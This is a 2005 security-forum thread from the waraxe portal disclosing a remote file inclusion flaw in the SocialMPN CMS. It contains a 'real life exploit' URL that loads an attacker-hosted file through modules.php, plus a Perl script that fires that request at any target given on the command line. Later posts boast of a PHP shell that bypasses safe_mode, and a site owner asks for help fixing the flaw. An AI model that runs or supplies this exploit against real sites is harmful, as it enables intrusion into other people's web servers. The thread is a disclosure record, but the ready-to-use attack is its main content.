Waraxe IT Security Portal
Login or Register
November 16, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 84
Members: 0
Total: 84
Full disclosure
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
4 vulnerabilities in ibmsecurity
32 vulnerabilities in IBM Security Verify Access
xlibre Xnest security advisory & bugfix releases
APPLE-SA-10-29-2024-1 Safari 18.1
SEC Consult SA-20241030-0 :: Query Filter Injection in Ping Identity PingIDM (formerly known as ForgeRock Identity Management) (CVE-2024-23600)
SEC Consult SA-20241023-0 :: Authenticated Remote Code Execution in Multiple Xerox printers (CVE-2024-6333)
APPLE-SA-10-28-2024-8 visionOS 2.1
APPLE-SA-10-28-2024-7 tvOS 18.1
APPLE-SA-10-28-2024-6 watchOS 11.1
APPLE-SA-10-28-2024-5 macOS Ventura 13.7.1
APPLE-SA-10-28-2024-4 macOS Sonoma 14.7.1
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Remote file inclusion -> SocialMPN
Post new topicReply to topic View previous topic :: View next topic
SocialMPN
PostPosted: Sun Mar 06, 2005 6:45 pm Reply with quote
zer0-c00l
Advanced user
Advanced user
Joined: Jun 25, 2004
Posts: 72
Location: BRAZIL!




# SocialMPN Remote File Inclusion
# 06/03/2005
# discovered by zer0-c00l (irc.BRASnet.org at #NMAP)
# or email (lucaszero [at] gmail [dot] com)
# Versions of SocialMPN affected: All versions.
# SocialMPN oficial site: www.socialmpn.com (Its vulnerable too)
# PS.: A lot of sites (maybe all sites) has SafeMode in PHP.

Real Life Exploit:
http://[victim]/modules.php?name=[attacker evil file]&file=article&sid=2
View user's profile Send private message
PostPosted: Mon Mar 07, 2005 4:08 am Reply with quote
y3dips
Valuable expert
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




Nice job Smile

have you post a confirmation to the vendor ?

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
Remote Testing SocialMPN
PostPosted: Mon Mar 07, 2005 5:34 am Reply with quote
y3dips
Valuable expert
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




as soon as possible ive made an simple script for testing the site, i post it to bugtraq too

Code:

#!/usr/bin/perl -w

# Remote Testing SocialMPN Remote File Inclusion by y3dips [for testing only]
# Bug find by zer0-c00l , published at http://waraxe.us/ftopic-542-0-days0-orderasc-.html

print " * Remote Testing File Inclusion for SocialMPN by y3dips *\n";



use LWP;
use LWP::UserAgent;

if(@ARGV == 2)
{

$target= $ARGV[0];
$xploit= $ARGV[1];


my $ua = LWP::UserAgent->new;
$ua->agent("MSIE/6.0 Windows");
$ua->timeout(10);
$ua->env_proxy;

$url = "http://$target/modules.php?name=$xploit&file=article&sid=2";

my $injek = $ua->get($url);

print " -------------------------------\n";
if ($injek->is_success)
{
$injekcek = $injek->as_string;
if ($injekcek =~ /(HTTP\/1\.0 200 OK)/)
{
print("\n This Site Maybe Vulnerable \n");
}
else
{
die $injek->status_line;
}
print " --------------------------------\n";
}
}

else{
print "Gunakan: perl $0 [target] [xplo.txt] \n";
}

#EOF y3dips(c)2005



hope it helps

[/code]

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Tue Mar 08, 2005 8:41 am Reply with quote
zrontho
Beginner
Beginner
Joined: Mar 01, 2005
Posts: 3
Location: German




y3dips wrote:
as soon as possible ive made an simple script for testing the site, i post it to bugtraq too. hope its help


thanks a million for the sploit, but i still don't understand about the sentence Gunakan in

Code:
print "Gunakan: perl $0 [target] [xplo.txt] \n";


so, can you translate its to english or germany, 'cause i only understood english and germany
View user's profile Send private message
PostPosted: Tue Mar 08, 2005 5:49 pm Reply with quote
LINUX
Moderator
Moderator
Joined: May 24, 2004
Posts: 404
Location: Caiman




i report all holes and vendor fix all bugs
View user's profile Send private message Visit poster's website
PostPosted: Wed Mar 09, 2005 4:40 pm Reply with quote
y3dips
Valuable expert
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




zrontho wrote:
y3dips wrote:
as soon as possible ive made an simple script for testing the site, i post it to bugtraq too. hope its help


thanks a million for the sploit, but i still don't understand about the sentence Gunakan in

Code:
print "Gunakan: perl $0 [target] [xplo.txt] \n";


so, can you translate its to english or germany, 'cause i only understood english and germany



sorry ,

Gunakan in english : Use

im in love with my country , so i forget to change the word . LOL

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Wed Mar 09, 2005 5:25 pm Reply with quote
y3dips
Valuable expert
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




LINUX wrote:
i report all holes and vendor fix all bugs


nice responses uve done there Smile

eventhough many sites has set safemode 'ON' but there still many usefull thing could inform attacker about the sites

for example : phpinfo()

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Wed Mar 09, 2005 10:16 pm Reply with quote
LINUX
Moderator
Moderator
Joined: May 24, 2004
Posts: 404
Location: Caiman




y3dips wrote:
LINUX wrote:
i report all holes and vendor fix all bugs


nice responses uve done there Smile

eventhough many sites has set safemode 'ON' but there still many usefull thing could inform attacker about the sites

for example : phpinfo()



safemode not is protection, i have shell in php bypass safemode.

i discover multiple XSS in socialsmpn and report to developers and i test all smpn systems all fixed
View user's profile Send private message Visit poster's website
PostPosted: Fri Mar 11, 2005 1:31 am Reply with quote
y3dips
Valuable expert
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




LINUX wrote:

safemode not is protection, i have shell in php bypass safemode.

i discover multiple XSS in socialsmpn and report to developers and i test all smpn systems all fixed


oh,
i tought safemode 'on' will increase the security because ( CMIIW )
as i know By enabling safe_mode parameter, PHP scripts are able to access files only when their owner is the owner of the PHP scripts. This is one of the most " important security " mechanisms built into the PHP. Effectively counteracts unauthorized attempts to access system files (e.g. /etc/paswd) and adds many restrictions that make unauthorized access more difficult.<taken from " Securing PHP: Step-by-step
by Artur Maj" >

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Sat Mar 12, 2005 6:57 am Reply with quote
zrontho
Beginner
Beginner
Joined: Mar 01, 2005
Posts: 3
Location: German




y3dips wrote:
sorry ,

Gunakan in english : Use

im in love with my country , so i forget to change the word . LOL


thanks dude for the cool reply !!!

keep fighting !!!!
View user's profile Send private message
PostPosted: Mon Jun 13, 2005 3:49 pm Reply with quote
MrCl3an
Beginner
Beginner
Joined: Jun 13, 2005
Posts: 1




I appreciate the notification I recevied back in March about our system's vulnerabilities regarding remote file inclusion.

However I request some help in finding a new remote file inclusion problem that has been brought to my attention. I have been told that I have 7 days to resolve this bug (not sure sure what will happen in 7 days, but I am expecting an exploit) and I thought I had resolved this issue back in March completely, but apperently not.

Any help in finding what problem is there would be very helpful. I can work with whomever wants to help to make our system more secure.

Thank you again for your time.
View user's profile Send private message
SocialMPN
www.waraxe.us Forum Index -> Remote file inclusion
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.045 Seconds